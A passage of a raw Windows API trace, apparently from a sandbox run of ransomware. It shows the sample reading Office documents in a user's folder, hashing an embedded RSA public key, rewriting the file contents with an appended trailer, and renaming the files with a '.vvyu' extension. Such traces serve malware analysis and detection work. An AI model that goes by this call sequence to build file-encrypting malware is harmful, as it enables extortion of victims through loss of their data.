[0193.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.255] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.255] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.255] CloseHandle (hObject=0x568) returned 1 [0193.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea0a68 [0193.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.257] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\3Lz_J5_6ki.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\3lz_j5_6ki.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\3Lz_J5_6ki.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\3lz_j5_6ki.docx.vvyu")) returned 1 [0193.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.260] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.263] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff302db0, ftCreationTime.dwHighDateTime=0x1d8869b, ftLastAccessTime.dwLowDateTime=0x116527d0, ftLastAccessTime.dwHighDateTime=0x1d89766, ftLastWriteTime.dwLowDateTime=0x116527d0, ftLastWriteTime.dwHighDateTime=0x1d89766, nFileSizeHigh=0x0, nFileSizeLow=0xd1bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4COwR1C7ya7.pptx", cAlternateFileName="4COWR1~1.PPT")) returned 1 [0193.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95770 [0193.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95770 | out: hHeap=0x620000) returned 1 [0193.263] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\4COwR1C7ya7.pptx") returned=".pptx" [0193.263] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\4COwR1C7ya7.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\4cowr1c7ya7.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.264] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=53693) returned 1 [0193.264] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.267] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xd197, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.267] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.271] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.271] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xd1bd, lpOverlapped=0x0) returned 1 [0193.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.273] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.274] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.274] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.274] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.274] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.274] GetLastError () returned 0x0 [0193.274] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.274] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.275] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.275] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.275] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd1c0) returned 0x2ea79b0 [0193.276] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95770 [0193.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93768 [0193.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e957b8 [0193.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93780 [0193.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937b0 [0193.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93810 [0193.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937c8 [0193.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.277] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea0a68 [0193.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93810 [0193.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0193.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937c8 [0193.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c937b0 [0193.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0193.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0193.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0193.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0193.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.280] GetCurrentThreadId () returned 0x66c [0193.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9ee70 [0193.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.281] GetCurrentThreadId () returned 0x66c [0193.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93810 [0193.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937b0 [0193.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937c8 [0193.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93798 [0193.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93828 [0193.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0193.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937f8 [0193.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937e0 [0193.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93840 [0193.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937e0 [0193.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937b0 [0193.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea0a68 [0193.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0193.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea0c78 [0193.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0193.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0193.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea0e90 [0193.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0193.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e90 | out: hHeap=0x620000) returned 1 [0193.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0193.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e957b8 | out: hHeap=0x620000) returned 1 [0193.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.290] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xd1b8, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xd1b8, lpOverlapped=0x0) returned 1 [0193.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.291] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xd1bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.291] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) 